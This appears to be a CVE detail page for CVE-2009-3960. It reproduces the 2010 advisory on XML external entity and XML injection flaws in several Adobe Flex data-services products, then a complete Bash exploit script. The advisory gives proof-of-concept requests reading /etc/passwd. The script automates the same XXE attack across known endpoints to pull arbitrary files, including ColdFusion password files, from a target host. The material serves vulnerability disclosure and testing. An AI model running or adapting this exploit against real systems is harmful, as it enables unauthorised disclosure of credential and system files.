CVE-2009-3960 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

( , ) (, . `.' ) ('. ', ). , ('. ( ) ( (_,) .`), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _='`"``=. presents.. Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities CVE: CVE-2009-3960 Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf +-----------+ |Description| +-----------+ Security-Assessment.com discovered that multiple Adobe products with different Data Services versions are vulnerable to XML External Entity (XXE) and XML injection attacks. XML external Entities injection allows a wide range of XML based attacks, including local file disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt +--------------+ |Product Review| +--------------+ Adobe Data Services components provide Flex/RIA applications with data messaging, remoting and management capabilities. The discovered vulnerabilities affect the HTTPChannel servlet classes which are respectively “mx.messaging.channels.HTTPChannel” and “mx.messaging.channels.SecureHTTPChannel”. These classes are part of the Data Services Messaging classes and can be found in the flex-messaging-common.jar Java archive. The HTTPChannel transports data in the AMFX format, which is the text-based XML representation of AMF. The HTTPChannel endpoints are defined in the services-config.xml file, located within the Flex/WEB-INF folder of the application. By default, the HTTPChannel classes are mapped to the following endpoints: 1. http://{server.name}:{server.port}/{context.root}/messagebroker/http 2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure Note that the HTTPChannel may be mapped to different endpoints. This depends on the deployed application and the framework in use (e.g. BlazeDS, Adobe LiveCycle Data Services, etc.). +--------------------------------------------+ |Exploitation - XML External Entity Injection| +--------------------------------------------+ XML entities can be declared and included within AMFX requests passed to the HTTPChannel. The XML parser parses the payload and successfully processes injected entities. The following table shows an example of XML external entity injection which leads to local file disclosure. The AMFX request is sent via the HTTPChannel endpoint in BlazeDS. XML External Entity Injection – Local File Disclosure PoC – BlazeDS – Request POST /samples/messagebroker/http HTTP/1.1 Content-type: application/x-amf <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]> <amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"> <body> <object type="flex.messaging.messages.CommandMessage"> <traits> <string>body</string><string>clientId</string><string>correlationId</string> <string>destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLive</string> </traits><object><traits /> </object> <null /><string /><string /> <object> <traits> <string>DSId</string><string>DSMessagingVersion</string> </traits> <string>nil</string><int>1</int> </object> <string>&x3;</string> <int>5</int><int>0</int><int>0</int> </object> </body> </amfx> XML External Entity Injection – Local File Inclusion PoC – BlazeDS – Response <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true"> <string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header> <body targetURI="/onResult" responseURI=""> <object type="flex.messaging.messages.AcknowledgeMessage"> <traits><string>timestamp</string><string>headers</string> <string>body</string><string>correlationId</string> <string>messageId</string><string>timeToLive</string> <string>clientId</string><string>destination</string> </traits><double>1.257387140632E12</double><object> <traits><string>DSMessagingVersion</string> <string>DSId</string></traits><double>1.0</double> <string>BDE929FE-270D-3B56-1061-616E8B938429</string> </object><null/><string>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh [...] The above injection was successfully tested on multiple Adobe products, as shown below: 1. Product: Adobe BlazeDS 3.2.0.39 Linux Ubuntu 9.04 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 2. Adobe LiveCycle Data Services ES2 3.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 3. ColdFusion 9.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/flex2gateway/http {server.name}:{server.port}/ {context.root}/flex2gateway/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 4. Adobe LiveCycle ES2 Windows XP SP2 / IBM Websphere 7.0 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS The vendor has released several patches for this vulnerability. See the Solution section of this document for more information. +----------------------------+ |Exploitation - XML Injection| +----------------------------+ The XML parser lacks of proper input and output validation controls. Security-Assessment.com managed to inject arbitrary XML content which was returned in the XML response. The following table shows an XML injection in the BlazeDS HTTPChannel. The injected payload becomes part of the response. In this case, injection is possible via the “responseURI” attribute. XMLInjection – BlazeDS - Request POST /samples/messagebroker/http HTTP/1.1 Content-type: application/x-amf <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/> </body></amfx> XMLInjection – BlazeDS - Response <?xml version="1.0" encoding="utf-8"?> <amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx> The above injection was successfully tested on multiple Adobe products, as shown below: 1. Product: Adobe BlazeDS 3.2.0.39 Linux Ubuntu 9.04 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 2. Adobe LiveCycle Data Services ES2 3.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 3. ColdFusion 9.0 Windows XP SP2 / Tomcat 6.0.14 Endpoint URIs: {server.name}:{server.port}/ {context.root}/flex2gateway/http {server.name}:{server.port}/ {context.root}/flex2gateway/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS 4. Adobe LiveCycle ES2 Windows XP SP2 / IBM Websphere 7.0 Endpoint URIs: {server.name}:{server.port}/ {context.root}/messagebroker/http {server.name}:{server.port}/ {context.root}/messagebroker/httpsecure Methods: POST, GET Protocols: HTTP, HTTPS The vendor has released several patches for this vulnerability. See the Solution section of this document for more information. +--------+ |Solution| +--------+ Security-Assessment.com follows responsible disclosure and promptly contacted the vendor after discovering the issues. The vendor was contacted on the 6th November 2009 and a reply was received on the same day. The vendor released security patches on the 11th February 2010. The security patches can be downloaded at the following website: http://www.adobe.com/support/security/bulletins/apsb10-05.html +------+ |Credit| +------+ Discovered and advised to Adobe in November 2009 by Roberto Suggi Liverani of Security- Assessment.com. Personal Page: http://malerisch.net/ For full details regarding this vulnerability download the PDF from our website: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf +---------+ |Greetings| +---------+ Bug found at Hack in The Sun 2009, Waiheke Island. +-----------------------------+ |About Security-Assessment.com| +-----------------------------+ Security-Assessment.com is a New Zealand based world leader in web application testing, network security and penetration testing. Security-Assessment.com services organisations across New Zealand, Australia, Asia Pacific, the United States and the United Kingdom. Roberto Suggi Liverani

#!/bin/bash # # Exploit Title: Adobe XML Injection file content disclosure # Date: 07-04-2017 # Exploit Author: Thomas Sluyter # Website: https://www.kilala.nl # Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html # Version: Multiple Adobe products # Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise # CVE : 2009-3960 # # Shell script that let's you exploit a known XML injection vulnerability # in a number of Adobe products, allowing you to read files that are otherwise # inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject # This script is a Bash implementation of the PoC multiple/dos/11529.txt. # # According to the original Metasploit code, this attack works with: # "Multiple Adobe Products: BlazeDS 3.2 and earlier versions, # LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, # and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2" # PROGNAME="$(basename $0)" # This script TIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles SCRATCHFILE="/tmp/${PROGNAME}.${TIMESTAMP}" # Used as generic scratchfile EXITCODE="0" # Assume success, changes on errors CURL="/usr/bin/curl" # Other locations are detected with "which" SSL="0" # Overridden by -s DEBUG="0" # Overridden by -d BREAKFOUND="0" # Overridden by -b TARGETHOST="" # Overridden by -h TARGETPORT="8400" # Overridden by -p READFILE="/etc/passwd" # Overridden by -f ################################## OVERHEAD SECTION # # Various functions for overhead purposes. # # Defining our own logger function, so we can switch between stdout and syslog. logger() { LEVEL="$1" MESSAGE="$2" # You may switch the following two, if you need to log to syslog. #[[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || /usr/bin/logger -p ${LEVEL} "$MESSAGE" [[ ${DEBUG} -gt 0 ]] && echo "${LEVEL} $MESSAGE" || echo "${LEVEL} $MESSAGE" } ExitCleanup() { EXITCODE=${1} rm -f ${SCRATCHFILE}* >/dev/null 2>&1 echo "" exit ${EXITCODE} } # Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script ValidIP() { local IP=${1} local STAT=1 if [[ ${IP} =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]] then OIFS=$IFS; IFS='.' IP=(${IP}) IFS=$OIFS [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]] stat=$? fi return $stat } # Function to output help information. show-help() { echo "" cat << EOF ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file] -? Show this help message. -d Debug mode, outputs more kruft on stdout. -s Use SSL / HTTPS, instead of HTTP. -b Break on the first valid answer found. -h Target host -p Target port, defaults to 8400. -f Full path to file to grab, defaults to /etc/passwd. This script exploits a known vulnerability in a set of Adobe applications. Using one of a few possible URLs on the target host (-h) we attempt to read a file (-f) that is normally inaccessible. NOTE: Windows paths use \\, so be sure to properly escape them when using -f! For example: ${PROGNAME} -h 192.168.1.20 -f c:\\\\coldfusion8\\\\lib\\\\password.properties ${PROGNAME} -h 192.168.1.20 -f 'c:\\coldfusion8\\lib\\password.properties' This script relies on CURL, so please have it in your PATH. EOF } # Parsing and verifying the passed parameters. OPTIND=1 while getopts "?dsbh:p:f:" opt; do case "$opt" in \?) show-help; ExitCleanup 0 ;; d) DEBUG="1" ;; s) SSL="1" ;; b) BREAKFOUND="1" ;; h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) ValidIP ${OPTARG}; if [[ $? -eq 0 ]] then TARGETHOST=${OPTARG} else TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}') [[ $? -gt 0 ]] && (logger ERROR "Target host ${TARGETHOST} not found in DNS."; ExitCleanup 1) fi ;; p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) if [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]] then logger ERROR "Target port ${OPTARG} is incorrect."; ExitCleanup 1 else TARGETPORT=${OPTARG} fi ;; f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1) if [[ (-z $(echo ${OPTARG} | grep ^\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]] then logger ERROR "File is NOT specified with full Unix or Windows path."; ExitCleanup 1 else READFILE=${OPTARG} fi ;; *) show-help; ExitCleanup 0 ;; esac done [[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR "CURL was not found."; ExitCleanup 1) [[ -z ${TARGETHOST} ]] && (logger ERROR "Target host was not set."; ExitCleanup 1) [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}." ################################## GETTING TO WORK # # PATHLIST=("/flex2gateway/" "/flex2gateway/http" "/flex2gateway/httpsecure" \ "/flex2gateway/cfamfpolling" "/flex2gateway/amf" "/flex2gateway/amfpolling" \ "/messagebroker/http" "/messagebroker/httpsecure" "/blazeds/messagebroker/http" \ "/blazeds/messagebroker/httpsecure" "/samples/messagebroker/http" \ "/samples/messagebroker/httpsecure" "/lcds/messagebroker/http" \ "/lcds/messagebroker/httpsecure" "/lcds-samples/messagebroker/http" \ "/lcds-samples/messagebroker/httpsecure") echo "<?xml version=\"1.0\" encoding=\"utf-8\"?>" > ${SCRATCHFILE} echo "<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"${READFILE}\"> ]>" >> ${SCRATCHFILE} echo "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">" >> ${SCRATCHFILE} echo "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>" >> ${SCRATCHFILE} echo "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>" >> ${SCRATCHFILE} echo "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>" >> ${SCRATCHFILE} echo "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>" >> ${SCRATCHFILE} echo "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>" >> ${SCRATCHFILE} echo "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>" >> ${SCRATCHFILE} if [[ ${DEBUG} -gt 0 ]] then logger DEBUG "XML file sent to target host reads as follows:" echo "======================================" cat ${SCRATCHFILE} echo "======================================" echo "" fi let CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1 for ADOBEPATH in "${PATHLIST[@]}" do [[ ${SSL} -gt 0 ]] && PROTOCOL="https" || PROTOCOL="http" URI="${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}" [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Proceeding with URI: ${URI}" # Header contents based on a tcpdump capture of original exploit being # run from Metasploit. HEADER="-H \"Host: ${TARGETHOST}\" -H \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\" -H \"Content-Type: application/x-www-form-urlencoded\" -H \"Content-Length: ${CONTENTLENGTH}\"" CURLPOST="${CURL} -X POST -k -s --http1.1 ${HEADER} -w \"%{http_code}\" -d @- ${URI}" [[ ${DEBUG} -gt 0 ]] && logger DEBUG "Using this CURL command: ${CURLPOST}" # The tr command dikes out any non-ASCII characters which might mess with output. CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\11\12\15\40-\176' 2>&1) # Output is pretty garbled and the HTTP return code is enclosed in double quotes. # I need to grab the last 5 chars (includes NULL EOF) and remove the ". CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:]) if [[ ${DEBUG} -gt 0 ]] then logger DEBUG "CURL was given this HTTP return code: ${CURLCODE}." logger DEBUG "Output from CURL reads as follows:" echo "======================================" echo "${CURLOUTPUT}" echo "======================================" echo "" fi logger INFO "${CURLCODE} for ${URI}" if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep "<?xml version=")) ]] then echo "Read from ${URI}:" echo "${CURLOUTPUT}" | sed 's/^[^<]*</</' [[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0 fi if [[ ${DEBUG} -gt 0 ]] then echo -e "\nReady to continue with the next URI? [y/n]: \c" read READY case ${READY} in y|Y|yes) logger DEBUG "Moving to next URI."; echo "" ;; *) logger DEBUG "Aborting..."; ExitCleanup 1 ;; esac fi done ExitCleanup 0